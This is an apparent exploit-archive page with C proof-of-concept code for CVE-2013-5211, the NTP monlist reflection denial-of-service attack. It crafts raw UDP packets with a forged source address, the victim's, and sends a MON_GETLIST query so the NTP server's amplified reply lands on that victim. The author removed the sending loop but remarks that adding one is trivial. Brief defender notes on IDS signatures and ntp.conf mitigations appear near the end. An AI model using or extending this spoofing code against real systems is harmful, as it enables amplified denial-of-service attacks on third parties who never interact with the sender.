Mayk0

#; NTP ntpd monlist Query Reflection - Denial of Service

Apr 29th, 2014
  1. Full title NTP ntpd monlist Query Reflection - Denial of Service
  2. Date add 2014-04-29
  3. Category dos / poc
  4. Platform linux
  5. Risk Security Risk Medium
  6. CVE CVE: 2013-5211
  7. ==============================================
  8.  
  9. /*
  10.  * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification
  11.  * Date: 28/04/2014
  12.  * Code Author: Danilo PC - <DaNotKnow@gmail.com>
  13.  * CVE : CVE-2013-5211
  14. */
  15.   
  16. /* I coded this program to help others understand how a DDoS attack amplified by NTP servers works (CVE-2013-5211).
  17.  * I took out the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there are a lot of kiddies out there,
  18.  *  if you know how to program, making a loop or using it with another tool is a piece of cake. The core idea is there, just use it as you please.
  19.  */
  20.   
  21. //------------------------------------------------------------------------------------------------//
  22. //------------------------------------------------------------------------------------------------//
  23.   
  24.   
  25. #include <stdio.h>         //For on printf function
  26. #include <string.h>        //For memset
  27. #include <sys/socket.h>    //Structs and Functions used for sockets operations.
  28. #include <stdlib.h>      //For exit function
  29. #include <netinet/ip.h>    //Structs for IP header
  30.   
  /*
   * UDP header overlay: four unsigned short fields placed directly after the
   * IP header inside the packet buffer. main() stores the port and length
   * values through htons(), i.e. in network byte order.
   */
  struct udpheader {
      unsigned short udp_sourcePortNumber;        /* source port */
      unsigned short udp_destinationPortNumber;   /* destination port */
      unsigned short udp_length;                  /* UDP header plus payload, in bytes */
      unsigned short udp_checksum;                /* UDP checksum (main() leaves it 0) */
  };
  38.   
  /*
   * NTP request overlay placed after the UDP header. The author describes it
   * as a simplified copy of req_pkt from ntpdc.h. main() writes only
   * rm_vn_mode, implementation and request; every other field keeps the zero
   * left by the memset() of the packet buffer.
   */
  struct ntpreqheader {
      unsigned char  rm_vn_mode;      // response bit, more bit, version, mode
      unsigned char  auth_seq;        // key, sequence number
      unsigned char  implementation;  // implementation number
      unsigned char  request;         // request number
      unsigned short err_nitems;      // error code / number of data items
      unsigned short mbz_itemsize;    // item size
      char           data[40];        // data area (author's note: 32 previously, 176 byte max)
      unsigned long  tstamp;          // time stamp, for authentication
      unsigned int   keyid;           // key id (the original comment calls it the encryption key)
      char           mac[8];          // optional 8-byte authentication code
  };
  52.   
  53.   
  /*
   * One's-complement checksum over a buffer, in the form used for the IP
   * header checksum.
   *
   * ptr    - start of the data, read as unsigned short words exactly as
   *          they are stored in memory
   * nbytes - number of bytes to cover; an odd trailing byte is copied into
   *          the first byte of a zeroed word and added as well
   *
   * Returns the complement of the folded sum. Values of nbytes below 1 add
   * nothing, so the result is then 0xffff.
   */
  unsigned short csum(unsigned short *ptr,int nbytes)
  {
      long total = 0;
      int remaining;

      /* Add up every complete word. */
      for (remaining = nbytes; remaining > 1; remaining -= 2) {
          total += *ptr++;
      }

      /* One byte left over: place it in the first byte of a zeroed word. */
      if (remaining == 1) {
          unsigned short tail = 0;
          *(unsigned char *)&tail = *(unsigned char *)ptr;
          total += tail;
      }

      /* Fold the carries back into the low 16 bits, then complement. */
      total = (total >> 16) + (total & 0xffff);
      total += total >> 16;
      return (unsigned short)(short)~total;
  }
  77.   
  78.   
  79. // main: builds one raw IPv4/UDP datagram holding an NTP mode 7 request (request code 42, MON_GETLIST) and sends it once.
  80. // argv[1] is written into the IP source field and argv[2] is the NTP server, so any reply is addressed to argv[1], not to this host.
  81. int main(int argc, char **argv)
  82. {
  83. int status;         // Return value of the most recent setsockopt()/sendto() call
  84. struct iphdr *ip;       // Points at the IP header inside packet[]
  85. struct udpheader *udp;      // Points at the UDP header inside packet[]
  86. struct ntpreqheader *ntp;   // Points at the NTP request inside packet[]
  87. int sockfd;         // Raw socket file descriptor
  88. int one = 1;            // Option value for IP_HDRINCL: tells the kernel the IP header is already included in the packet
  89. struct sockaddr_in dest;    // Destination address handed to sendto()
  90. char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; // The datagram itself: IP header, UDP header and NTP request back to back
  91.   
  92. // Exactly two arguments are required; anything else prints the usage text and exits with status 1
  93.     if( argc != 3){
  94.         printf("Usage: ./ntpDdos [Target IP] [NTP Server IP]\n");
  95.         printf("Example: ./ntpDdos 1.2.3.4 127.0.0.1 \n");
  96.         printf("Watch it on wireshark!\n");
  97.         printf("Coded for education purpose only!\n");
  98.         exit(1);
  99.     }
  100.   
  101. // Open a raw socket with UDP as the layer 4 protocol
  102.     sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
  103.     if (sockfd == -1){
  104.         printf("Error on initializing the socket\n");
  105.         exit(1);
  106.     }
  107.   
  108.   
  109.   
  110. // Set IP_HDRINCL so the IP header built below is used instead of a kernel-generated one
  111.     status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
  112.     if (status == -1){
  113.                 printf("Error on setting the option HDRINCL on socket\n");
  114.                 exit(1);
  115.         }
  116.   
  117.   
  118. // Zero the whole buffer; every field not assigned below stays 0
  119.     memset( packet, 0, sizeof(packet) );
  120.   
  121.   
  122. // Overlay the three header structs on the buffer
  123. // Layout inside packet[]: [ [IP HEADER] [UDP HEADER] [NTP HEADER] ]
  124.     ip = (struct iphdr *)packet;
  125.     udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
  126.     ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
  127.   
  128.   
  129. // Fill the IP header
  130.     ip->version = 4;     // IPv4
  131.         ip->ihl = 5;         // Header length in 32-bit words; 5 is the minimum (no options)
  132.         ip->tos = 0;         // Type of service, default value 0
  133.         ip->tot_len = sizeof(packet);   // Size of the whole datagram
  134.         ip->id = htons(1234);    // Identification number, fixed at 1234
  135.         ip->frag_off = 0;        // Flags and fragment offset, all zero
  136.         ip->ttl = 255;               // Time to live, the maximum value
  137.         ip->protocol = IPPROTO_UDP;  // Next-layer protocol is UDP
  138.         ip->check = 0;               // Checksum field cleared before csum() is called below
  139.         ip->saddr = inet_addr( argv[1] );  // Source address comes from argv[1], not from this host (the forged field)
  140.         ip->daddr = inet_addr( argv[2] ); // Destination address: the NTP server from argv[2]
  141.   
  142.     // Fill the UDP header
  143.     udp->udp_sourcePortNumber = htons( atoi( "123" ) );       // Source port 123
  144.     udp->udp_destinationPortNumber = htons(atoi("123")) ;   // Destination port 123
  145.     udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); // UDP header plus NTP request, in bytes
  146.     udp->udp_checksum = 0;                    // UDP checksum left at 0
  147.   
  148.     // Compute the checksum
  149.     ip->check = csum((unsigned short *)packet, ip->tot_len);   // csum() runs over ip->tot_len bytes, i.e. the whole buffer as filled so far, not only the IP header
  150.   
  151.     // Fill the destination address for sendto()
  152.     dest.sin_family = AF_INET;               // Address family IPv4
  153.     dest.sin_port = htons (atoi( "123" ) ) ;        // Destination port
  154.     dest.sin_addr.s_addr = inet_addr( argv[2] );       // Destination: the address the packet is sent to
  155.   
  156.     // Fill the NTP request
  157.     // The request must carry the mode and request code of a MON_GETLIST query and nothing else.
  158.     // The author notes that ntp_types.h provides structures and macros for this; here a simplified version of the
  159.     // NTP request packet is used, with the field values for a "MON_GETLIST" request hardcoded.
  160.     // Reference given by the author: http://searchcode.com/codesearch/view/451164#127
  161.     ntp->rm_vn_mode=0x17;       // Response bit 0, more bit 0, version field 2, mode field 7
  162.     ntp->implementation=0x03;   // Implementation number 3
  163.     ntp->request=0x2a;       // Request code 42 ( MON_GETLIST )
  164.                     // All the other fields of the struct stay zeroed
  165.     // NOTE(defenders): on the wire this is UDP port 123, NTP mode 7, request code 42; that combination is what a monlist filter or IDS rule can match on.
  166.     // Server-side mitigation in ntp.conf is `disable monitor` or `restrict default noquery`; ingress filtering (BCP 38) addresses the forged source address.
  167.     // Send the datagram once
  168.     status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
  169.         if(status <0){
  170.             printf("Failed to send the packets\n");
  171.             exit(1);
  172.         }
  173.   
  174.   
  175. }